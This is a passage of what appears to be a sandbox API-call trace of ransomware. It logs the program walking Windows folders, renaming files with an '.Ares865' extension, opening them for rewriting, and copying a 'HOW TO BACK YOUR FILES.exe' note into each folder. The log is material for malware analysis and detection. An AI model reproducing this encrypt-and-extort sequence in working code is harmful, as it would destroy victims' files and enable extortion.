Blue.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\soft blue.htm.ares865"), dwFlags=0x1) returned 1 [0149.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\soft blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.209] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0149.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.212] lstrcpyW (in: lpString1=0x2cce480, lpString2="SoftBlue.jpg" | out: lpString1="SoftBlue.jpg") returned="SoftBlue.jpg" [0149.212] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0149.212] lstrlenW (lpString="Ares865") returned 7 [0149.212] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0149.213] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.Ares865") returned 84 [0149.213] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\softblue.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\softblue.jpg.ares865"), dwFlags=0x1) returned 1 [0149.214] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\softblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.214] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10569) returned 1 [0149.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.218] lstrcpyW (in: lpString1=0x2cce480, lpString2="Stars.htm" | out: lpString1="Stars.htm") returned="Stars.htm" [0149.218] lstrlenW (lpString="Stars.htm") returned 9 [0149.218] lstrlenW (lpString="Ares865") returned 7 [0149.218] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0149.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm.Ares865") returned 81 [0149.218] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.htm.ares865"), dwFlags=0x1) returned 1 [0149.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0149.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.224] lstrcpyW (in: lpString1=0x2cce480, lpString2="Stars.jpg" | out: lpString1="Stars.jpg") returned="Stars.jpg" [0149.224] lstrlenW (lpString="Stars.jpg") returned 9 [0149.224] lstrlenW (lpString="Ares865") returned 7 [0149.224] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0149.225] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.Ares865") returned 81 [0149.225] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.jpg.ares865"), dwFlags=0x1) returned 1 [0149.227] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7505) returned 1 [0149.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.231] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" [0149.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0149.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0149.232] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned 59 [0149.232] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" [0149.232] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.232] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.232] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.233] GetLastError () returned 0x0 [0149.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.233] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.233] CloseHandle (hObject=0x120) returned 1 [0149.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.233] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.233] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.233] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.234] lstrcpyW (in: lpString1=0x2cce478, lpString2="1033" | out: lpString1="1033") returned="1033" [0149.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0149.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e95b0 [0149.234] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0149.234] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536d4b40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0149.234] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0149.234] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bdf7300, ftCreationTime.dwHighDateTime=0x1cb7004, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1bdf7300, ftLastWriteTime.dwHighDateTime=0x1cb7004, nFileSizeHigh=0x0, nFileSizeLow=0x87180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PortalConnectCore.dll", cAlternateFileName="PORTAL~1.DLL")) returned 1 [0149.234] lstrcmpiW (lpString1="PortalConnectCore.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0149.234] lstrcmpiW (lpString1="PortalConnectCore.dll", lpString2="aoldtz.exe") returned 1 [0149.234] lstrcpyW (in: lpString1=0x2cce478, lpString2="PortalConnectCore.dll" | out: lpString1="PortalConnectCore.dll") returned="PortalConnectCore.dll" [0149.234] lstrlenW (lpString="PortalConnectCore.dll") returned 21 [0149.234] lstrlenW (lpString="Ares865") returned 7 [0149.234] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0149.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.Ares865") returned 89 [0149.234] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll.ares865"), dwFlags=0x1) returned 1 [0149.236] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.236] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=553344) returned 1 [0149.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" [0149.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0149.266] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned 64 [0149.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" [0149.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.268] GetLastError () returned 0x0 [0149.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.268] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.268] CloseHandle (hObject=0x120) returned 1 [0149.268] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.268] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.268] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.268] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.268] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.268] lstrcpyW (in: lpString1=0x2cce482, lpString2="PortalConnect.dll" | out: lpString1="PortalConnect.dll") returned="PortalConnect.dll" [0149.268] lstrlenW (lpString="PortalConnect.dll") returned 17 [0149.268] lstrlenW (lpString="Ares865") returned 7 [0149.269] lstrcmpiW (lpString1="ect.dll", lpString2="Ares865") returned 1 [0149.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.Ares865") returned 90 [0149.269] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll.ares865"), dwFlags=0x1) returned 1 [0149.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17312) returned 1 [0149.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.275] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" [0149.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0149.275] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned 61 [0149.275] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" [0149.275] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0149.275] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\how to back your files.exe"), bFailIfExists=1) returned 0 [0149.276] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0149.276] GetLastError () returned 0x0 [0149.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0149.276] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0149.276] CloseHandle (hObject=0x120) returned 1 [0149.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0149.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0149.277] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0149.277] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.277] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0149.277] lstrcpyW (in: lpString1=0x2cce47c, lpString2="1033" | out: lpString1="1033") returned="1033" [0149.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0149.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e95b0 [0149.277] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0149.277] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a395f00, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xae3504c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7a395f00, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x35afb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0149.277] lstrcmpiW (lpString1="Csi.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0149.277] lstrcmpiW (lpString1="Csi.dll", lpString2="aoldtz.exe") returned 1 [0149.277] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Csi.dll" | out: lpString1="Csi.dll") returned="Csi.dll" [0149.277] lstrlenW (lpString="Csi.dll") returned 7 [0149.277] lstrlenW (lpString="Ares865") returned 7 [0149.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.Ares865") returned 77 [0149.278] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll.ares865"), dwFlags=0x1) returned 1 [0149.280] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.280] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3518384) returned 1 [0149.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0149.449] lstrcpyW (in: lpString1=0x2cce47c, lpString2="CsiSoap.dll" | out: lpString1="CsiSoap.dll") returned="CsiSoap.dll" [0149.450] lstrlenW (lpString="CsiSoap.dll") returned 11 [0149.450] lstrlenW (lpString="Ares865") returned 7 [0149.450] lstrcmpiW (lpString1="oap.dll", lpString2="Ares865") returned 1 [0149.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll.Ares865") returned 81 [0149.450] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll.ares865"), dwFlags=0x1) returned 1 [0149.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.453] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1219456) returned 1 [0149.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0149.516] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Cultures" | out: lpString1="Cultures") returned="Cultures" [0149.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0149.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x336fc8 [0149.517] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0149.517] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536faca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0149.517] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0149.517] FindNextFileW (in: hFindFile=0x2ccee8, 